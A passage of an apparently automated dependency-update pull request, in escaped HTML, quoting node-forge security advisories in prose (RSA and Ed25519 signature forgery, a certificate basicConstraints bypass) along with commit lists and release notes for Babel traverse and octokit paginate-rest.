CPU.\u003c/li\u003e\n\u003cli\u003eReported by Kr0emer.\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33891\"\u003eCVE-2026-33891\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\"\u003eGHSA-5gfm-wpxj-wjgq\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in RSA-PKCS due to ASN.1 extra field.\n\u003cul\u003e\n\u003cli\u003eRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low\npublic exponent keys (e=3). Attackers can forge signatures by stuffing\n\u0026quot;garbage\u0026quot; bytes within the ASN.1 structure in order to construct a\nsignature that passes verification, enabling Bleichenbacher style forgery.\nThis issue is similar to CVE-2022-24771, but adds bytes in an addition\nfield within the ASN.1 structure, rather than outside of it.\u003c/li\u003e\n\u003cli\u003eAdditionally, forge does not validate that signatures include a minimum of\n8 bytes of padding as defined by the specification, providing attackers\nadditional space to construct Bleichenbacher forgeries.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33894\"\u003eCVE-2026-33894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\"\u003eGHSA-ppp5-5v6c-4jwp\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in Ed25519 due to missing S \u0026lt; L check.\n\u003cul\u003e\n\u003cli\u003eEd25519 signature verification accepts forged non-canonical signatures\nwhere the scalar S is not reduced modulo the group order (S \u0026gt;= L). A valid\nsignature and its S + L variant both verify in forge, while Node.js\ncrypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the\nspecification. This class of signature malleability has been exploited in\npractice to bypass authentication and authorization logic (see\nCVE-2026-25793, CVE-2022-35961). Applications relying on signature\nuniqueness (i.e., dedup by signature bytes, replay tracking, signed-object\ncanonicalization checks) may be bypassed.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33895\"\u003eCVE-2026-33895\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw\"\u003eGHSA-q67f-28xg-22rw\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: \u003ccode\u003ebasicConstraints\u003c/code\u003e bypass in certificate chain verification.\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epki.verifyCertificateChain()\u003c/code\u003e does not enforce RFC 5280 \u003ccode\u003ebasicConstraints\u003c/code\u003e\nrequirements when an intermediate certificate lacks both the\n\u003ccode\u003ebasicConstraints\u003c/code\u003e and \u003ccode\u003ekeyUsage\u003c/code\u003e extensions. This allows any leaf\ncertificate (without these extensions) to act as a CA and sign other\ncertificates, which node-forge will accept as valid.\u003c/li\u003e\n\u003cli\u003eReported by Doruk Tan Ozturk (\u003ca href=\"https://github.com/peaktwilight\"\u003e\u003ccode\u003e@​peaktwilight\u003c/code\u003e\u003c/a\u003e) - doruk.ch\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33896\"\u003eCVE-2026-33896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25\"\u003eGHSA-2328-f5f3-gj25\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/fa385f92440879601240020f158bed68e444e83a\"\u003e\u003ccode\u003efa385f9\u003c/code\u003e\u003c/a\u003e Release 1.4.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/07d4e162762ed4fdab5caca9ebf78237fcf85339\"\u003e\u003ccode\u003e07d4e16\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/cb90fd92091ee34e4abab3ad0c835eeea3d06c3e\"\u003e\u003ccode\u003ecb90fd9\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/963e7c5c7b0f03de1b28a1e5a42a6bafda4cf711\"\u003e\u003ccode\u003e963e7c5\u003c/code\u003e\u003c/a\u003e Add unit test for \u0026quot;pseudonym\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/f0b6f5b7c5d1c918240e975e0cade4f47d005446\"\u003e\u003ccode\u003ef0b6f5b\u003c/code\u003e\u003c/a\u003e Add pseudonym OID\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/3df48a311d4b53dc6493b7a47a8d07f3669957d9\"\u003e\u003ccode\u003e3df48a3\u003c/code\u003e\u003c/a\u003e Fix missing CVE ID.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90\"\u003e\u003ccode\u003e2e49283\u003c/code\u003e\u003c/a\u003e Add x509 \u003ccode\u003ebasicConstraints\u003c/code\u003e check.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85\"\u003e\u003ccode\u003ebdecf11\u003c/code\u003e\u003c/a\u003e Add canonical signature scaler check for S \u0026lt; L.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/af094e69c60ac5f7b29f2b1957c53ae5e12fd4a0\"\u003e\u003ccode\u003eaf094e6\u003c/code\u003e\u003c/a\u003e Add RSA padding and DigestInfo length checks.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/796eeb1673f6ec636fda02dfc295047d9f7aefe0\"\u003e\u003ccode\u003e796eeb1\u003c/code\u003e\u003c/a\u003e Improve jsbn fix.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/digitalbazaar/forge/compare/v1.3.0...v1.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.14.2 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/traverse's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e@​octokit/plugin-paginate-rest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 